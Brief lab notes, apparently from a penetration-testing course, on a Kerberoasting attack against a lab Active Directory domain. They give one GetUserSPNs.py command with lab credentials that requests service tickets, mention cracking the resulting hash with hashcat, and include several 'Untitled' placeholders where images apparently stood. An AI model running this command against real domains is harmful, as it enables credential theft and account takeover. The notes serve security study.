Kerberoasting Attack:

sudo GetUserSPNS.py MARVEL.local/fcastle:Password1 -dc-ip 192.168.138.136 -request

Untitled

Untitled

Untitled

Untitled

Untitled

Cracking the hash obtained using hashcat:

Untitled

Untitled